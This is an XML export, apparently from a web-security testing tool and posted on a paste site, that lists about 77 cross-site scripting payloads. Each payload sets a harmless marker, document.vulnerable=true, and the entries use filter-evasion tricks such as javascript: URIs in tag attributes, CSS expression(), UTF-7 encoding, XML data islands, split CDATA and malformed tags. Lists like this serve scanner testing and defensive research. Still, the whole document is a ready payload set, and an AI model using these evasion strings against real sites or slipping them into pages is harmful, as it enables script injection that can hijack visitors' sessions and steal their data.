From Mustard Anoa, 13 Years ago, written in XML.
Embed
  1. <?xml version="1.0"?>
  2. <exportedattacks>
  3.         <attacks>
  4.                 <attack>
  5.                         <attackString><![CDATA[<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">]]></attackString>
  6.                         <signature>Script</signature>
  7.                 </attack>
  8.                 <attack>
  9.                         <attackString><![CDATA[ <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> ]]></attackString>
  10.                         <signature>Script</signature>
  11.                 </attack>
  12.                 <attack>
  13.                         <attackString><![CDATA[ <SCRIPT>document.vulnerable=true;</SCRIPT> ]]></attackString>
  14.                         <signature>Script</signature>
  15.                 </attack>
  16.                 <attack>
  17.                         <attackString><![CDATA[ <IMG SRC="jav ascript:document.vulnerable=true;"> ]]></attackString>
  18.                         <signature>Script</signature>
  19.                 </attack>
  20.                 <attack>
  21.                         <attackString><![CDATA[ <IMG SRC="javascript:document.vulnerable=true;"> ]]></attackString>
  22.                         <signature>Script</signature>
  23.                 </attack>
  24.                 <attack>
  25.                         <attackString><![CDATA[ <IMG SRC=" &#14; javascript:document.vulnerable=true;"> ]]></attackString>
  26.                         <signature>Script</signature>
  27.                 </attack>
  28.                 <attack>
  29.                         <attackString><![CDATA[ <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> ]]></attackString>
  30.                         <signature>Script</signature>
  31.                 </attack>
  32.                 <attack>
  33.                         <attackString><![CDATA[ <<SCRIPT>document.vulnerable=true;//<</SCRIPT> ]]></attackString>
  34.                         <signature>Script</signature>
  35.                 </attack>
  36.                 <attack>
  37.                         <attackString><![CDATA[ <SCRIPT <B>document.vulnerable=true;</SCRIPT> ]]></attackString>
  38.                         <signature>Script</signature>
  39.                 </attack>
  40.                 <attack>
  41.                         <attackString><![CDATA[ <IMG SRC="javascript:document.vulnerable=true;" ]]></attackString>
  42.                         <signature>Script</signature>
  43.                 </attack>
  44.                 <attack>
  45.                         <attackString><![CDATA[ <iframe src="javascript:document.vulnerable=true; < ]]></attackString>
  46.                         <signature>Script</signature>
  47.                 </attack>
  48.                 <attack>
  49.                         <attackString><![CDATA[ <SCRIPT>a=/XSS/\ndocument.vulnerable=true;</SCRIPT> ]]></attackString>
  50.                         <signature>Script</signature>
  51.                 </attack>
  52.                 <attack>
  53.                         <attackString><![CDATA[ \";document.vulnerable=true;;// ]]></attackString>
  54.                         <signature>Script</signature>
  55.                 </attack>
  56.                 <attack>
  57.                         <attackString><![CDATA[ </TITLE><SCRIPT>document.vulnerable=true;</SCRIPT> ]]></attackString>
  58.                         <signature>Script</signature>
  59.                 </attack>
  60.                 <attack>
  61.                         <attackString><![CDATA[ <INPUT TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> ]]></attackString>
  62.                         <signature>Script</signature>
  63.                 </attack>
  64.                 <attack>
  65.                         <attackString><![CDATA[ <BODY BACKGROUND="javascript:document.vulnerable=true;"> ]]></attackString>
  66.                         <signature>Script</signature>
  67.                 </attack>
  68.                 <attack>
  69.                         <attackString><![CDATA[ <BODY ONLOAD=document.vulnerable=true;> ]]></attackString>
  70.                         <signature>Script</signature>
  71.                 </attack>
  72.                 <attack>
  73.                         <attackString><![CDATA[ <IMG DYNSRC="javascript:document.vulnerable=true;"> ]]></attackString>
  74.                         <signature>Script</signature>
  75.                 </attack>
  76.                 <attack>
  77.                         <attackString><![CDATA[ <IMG LOWSRC="javascript:document.vulnerable=true;"> ]]></attackString>
  78.                         <signature>Script</signature>
  79.                 </attack>
  80.                 <attack>
  81.                         <attackString><![CDATA[ <BGSOUND SRC="javascript:document.vulnerable=true;"> ]]></attackString>
  82.                         <signature>Script</signature>
  83.                 </attack>
  84.                 <attack>
  85.                         <attackString><![CDATA[ <BR SIZE="&{document.vulnerable=true}"> ]]></attackString>
  86.                         <signature>Script</signature>
  87.                 </attack>
  88.                 <attack>
  89.                         <attackString><![CDATA[ <LAYER SRC="javascript:document.vulnerable=true;"></LAYER> ]]></attackString>
  90.                         <signature>Script</signature>
  91.                 </attack>
  92.                 <attack>
  93.                         <attackString><![CDATA[ <LINK REL="stylesheet" HREF="javascript:document.vulnerable=true;"> ]]></attackString>
  94.                         <signature>Script</signature>
  95.                 </attack>
  96.                 <attack>
  97.                         <attackString><![CDATA[ <STYLE>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS ]]></attackString>
  98.                         <signature>Script</signature>
  99.                 </attack>
  100.                 <attack>
  101.                         <attackString><![CDATA[ ¼script¾document.vulnerable=true;¼/script¾ ]]></attackString>
  102.                         <signature>Script</signature>
  103.                 </attack>
  104.                 <attack>
  105.                         <attackString><![CDATA[ <IFRAME SRC="javascript:document.vulnerable=true;"></IFRAME> ]]></attackString>
  106.                         <signature>Script</signature>
  107.                 </attack>
  108.                 <attack>
  109.                         <attackString><![CDATA[ <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></FRAMESET> ]]></attackString>
  110.                         <signature>Script</signature>
  111.                 </attack>
  112.                 <attack>
  113.                         <attackString><![CDATA[ <TABLE BACKGROUND="javascript:document.vulnerable=true;"> ]]></attackString>
  114.                         <signature>Script</signature>
  115.                 </attack>
  116.                 <attack>
  117.                         <attackString><![CDATA[ <TABLE><TD BACKGROUND="javascript:document.vulnerable=true;"> ]]></attackString>
  118.                         <signature>Script</signature>
  119.                 </attack>
  120.                 <attack>
  121.                         <attackString><![CDATA[ <DIV STYLE="background-image: url(javascript:document.vulnerable=true;)"> ]]></attackString>
  122.                         <signature>Script</signature>
  123.                 </attack>
  124.                 <attack>
  125.                         <attackString><![CDATA[ <DIV STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> ]]></attackString>
  126.                         <signature>Script</signature>
  127.                 </attack>
  128.                 <attack>
  129.                         <attackString><![CDATA[ <DIV STYLE="width: expression(document.vulnerable=true);"> ]]></attackString>
  130.                         <signature>Script</signature>
  131.                 </attack>
  132.                 <attack>
  133.                         <attackString><![CDATA[ <STYLE>@im\port'\ja\vasc\ript:document.vulnerable=true';</STYLE> ]]></attackString>
  134.                         <signature>Script</signature>
  135.                 </attack>
  136.                 <attack>
  137.                         <attackString><![CDATA[ <IMG STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> ]]></attackString>
  138.                         <signature>Script</signature>
  139.                 </attack>
  140.                 <attack>
  141.                         <attackString><![CDATA[ <XSS STYLE="xss:expression(document.vulnerable=true)"> ]]></attackString>
  142.                         <signature>Script</signature>
  143.                 </attack>
  144.                 <attack>
  145.                         <attackString><![CDATA[ exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> ]]></attackString>
  146.                         <signature>Script</signature>
  147.                 </attack>
  148.                 <attack>
  149.                         <attackString><![CDATA[ <STYLE TYPE="text/javascript">document.vulnerable=true;</STYLE> ]]></attackString>
  150.                         <signature>Script</signature>
  151.                 </attack>
  152.                 <attack>
  153.                         <attackString><![CDATA[ <STYLE>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></A> ]]></attackString>
  154.                         <signature>Script</signature>
  155.                 </attack>
  156.                 <attack>
  157.                         <attackString><![CDATA[ <STYLE type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</STYLE> ]]></attackString>
  158.                         <signature>Script</signature>
  159.                 </attack>
  160.                 <attack>
  161.                         <attackString><![CDATA[ <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> ]]></attackString>
  162.                         <signature>Script</signature>
  163.                 </attack>
  164.                 <attack>
  165.                         <attackString><![CDATA[ <BASE HREF="javascript:document.vulnerable=true;//"> ]]></attackString>
  166.                         <signature>Script</signature>
  167.                 </attack>
  168.                 <attack>
  169.                         <attackString><![CDATA[ <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></OBJECT> ]]></attackString>
  170.                         <signature>Script</signature>
  171.                 </attack>
  172.                 <attack>
  173.                         <attackString><![CDATA[ <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> ]]></attackString>
  174.                         <signature>Script</signature>
  175.                 </attack>
  176.                 <attack>
  177.                         <attackString><![CDATA[ <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> ]]></attackString>
  178.                         <signature>Script</signature>
  179.                 </attack>
  180.                 <attack>
  181.                         <attackString><![CDATA[ <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></HTML> ]]></attackString>
  182.                         <signature>Script</signature>
  183.                 </attack>
  184.                 <attack>
  185.                         <attackString><![CDATA[ <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> ]]></attackString>
  186.                         <signature>Script</signature>
  187.                 </attack>
  188.                 <attack>
  189.                         <attackString><![CDATA[ <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- ]]></attackString>
  190.                         <signature>Script</signature>
  191.                 </attack>
  192.                 <attack>
  193.                         <attackString><![CDATA[ <a href="javascript#document.vulnerable=true;"> ]]></attackString>
  194.                         <signature>Script</signature>
  195.                 </attack>
  196.                 <attack>
  197.                         <attackString><![CDATA[ <div onmouseover="document.vulnerable=true;"> ]]></attackString>
  198.                         <signature>Script</signature>
  199.                 </attack>
  200.                 <attack>
  201.                         <attackString><![CDATA[ <img src="javascript:document.vulnerable=true;"> ]]></attackString>
  202.                         <signature>Script</signature>
  203.                 </attack>
  204.                 <attack>
  205.                         <attackString><![CDATA[ <img dynsrc="javascript:document.vulnerable=true;"> ]]></attackString>
  206.                         <signature>Script</signature>
  207.                 </attack>
  208.                 <attack>
  209.                         <attackString><![CDATA[ <input type="image" dynsrc="javascript:document.vulnerable=true;"> ]]></attackString>
  210.                         <signature>Script</signature>
  211.                 </attack>
  212.                 <attack>
  213.                         <attackString><![CDATA[ <bgsound src="javascript:document.vulnerable=true;"> ]]></attackString>
  214.                         <signature>Script</signature>
  215.                 </attack>
  216.                 <attack>
  217.                         <attackString><![CDATA[ &<script>document.vulnerable=true;</script> ]]></attackString>
  218.                         <signature>Script</signature>
  219.                 </attack>
  220.                 <attack>
  221.                         <attackString><![CDATA[ &{document.vulnerable=true;}; ]]></attackString>
  222.                         <signature>Script</signature>
  223.                 </attack>
  224.                 <attack>
  225.                         <attackString><![CDATA[ <img src=&{document.vulnerable=true;};> ]]></attackString>
  226.                         <signature>Script</signature>
  227.                 </attack>
  228.                 <attack>
  229.                         <attackString><![CDATA[ <link rel="stylesheet" href="javascript:document.vulnerable=true;"> ]]></attackString>
  230.                         <signature>Script</signature>
  231.                 </attack>
  232.                 <attack>
  233.                         <attackString><![CDATA[ <img src="mocha:document.vulnerable=true;"> ]]></attackString>
  234.                         <signature>Script</signature>
  235.                 </attack>
  236.                 <attack>
  237.                         <attackString><![CDATA[ <img src="livescript:document.vulnerable=true;"> ]]></attackString>
  238.                         <signature>Script</signature>
  239.                 </attack>
  240.                 <attack>
  241.                         <attackString><![CDATA[ <a href="about:<script>document.vulnerable=true;</script>"> ]]></attackString>
  242.                         <signature>Script</signature>
  243.                 </attack>
  244.                 <attack>
  245.                         <attackString><![CDATA[ <body onload="document.vulnerable=true;"> ]]></attackString>
  246.                         <signature>Script</signature>
  247.                 </attack>
  248.                 <attack>
  249.                         <attackString><![CDATA[ <div style="background-image: url(javascript:document.vulnerable=true;);"> ]]></attackString>
  250.                         <signature>Script</signature>
  251.                 </attack>
  252.                 <attack>
  253.                         <attackString><![CDATA[ <div style="behaviour: url([link to code]);"> ]]></attackString>
  254.                         <signature>Script</signature>
  255.                 </attack>
  256.                 <attack>
  257.                         <attackString><![CDATA[ <div style="binding: url([link to code]);"> ]]></attackString>
  258.                         <signature>Script</signature>
  259.                 </attack>
  260.                 <attack>
  261.                         <attackString><![CDATA[ <div style="width: expression(document.vulnerable=true;);"> ]]></attackString>
  262.                         <signature>Script</signature>
  263.                 </attack>
  264.                 <attack>
  265.                         <attackString><![CDATA[ <style type="text/javascript">document.vulnerable=true;</style> ]]></attackString>
  266.                         <signature>Script</signature>
  267.                 </attack>
  268.                 <attack>
  269.                         <attackString><![CDATA[ <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> ]]></attackString>
  270.                         <signature>Script</signature>
  271.                 </attack>
  272.                 <attack>
  273.                         <attackString><![CDATA[ <style><!--</style><script>document.vulnerable=true;//--></script> ]]></attackString>
  274.                         <signature>Script</signature>
  275.                 </attack>
  276.                 <attack>
  277.                         <attackString><![CDATA[ <<script>document.vulnerable=true;</script> ]]></attackString>
  278.                         <signature>Script</signature>
  279.                 </attack>
  280.                 <attack>
  281.                         <attackString><![CDATA[ <![CDATA[<!--]]<script>document.vulnerable=true;//--></script> ]]></attackString>
  282.                         <signature>Script</signature>
  283.                 </attack>
  284.                 <attack>
  285.                         <attackString><![CDATA[ <!-- -- --><script>document.vulnerable=true;</script><!-- -- --> ]]></attackString>
  286.                         <signature>Script</signature>
  287.                 </attack>
  288.                 <attack>
  289.                         <attackString><![CDATA[ <img src="blah"onmouseover="document.vulnerable=true;"> ]]></attackString>
  290.                         <signature>Script</signature>
  291.                 </attack>
  292.                 <attack>
  293.                         <attackString><![CDATA[ <img src="blah>" onmouseover="document.vulnerable=true;"> ]]></attackString>
  294.                         <signature>Script</signature>
  295.                 </attack>
  296.                 <attack>
  297.                         <attackString><![CDATA[ <xml src="javascript:document.vulnerable=true;"> ]]></attackString>
  298.                         <signature>Script</signature>
  299.                 </attack>
  300.                 <attack>
  301.                         <attackString><![CDATA[ <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> ]]></attackString>
  302.                         <signature>Script</signature>
  303.                 </attack>
  304.                 <attack>
  305.                         <attackString><![CDATA[ <div datafld="b" dataformatas="html" datasrc="#X"></div> ]]></attackString>
  306.                         <signature>Script</signature>
  307.                 </attack>
  308.                 <attack>
  309.                         <attackString><![CDATA[ [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> ]]></attackString>
  310.                         <signature>Script</signature>
  311.                 </attack>
  312.         </attacks>
  313. </exportedattacks>
  314.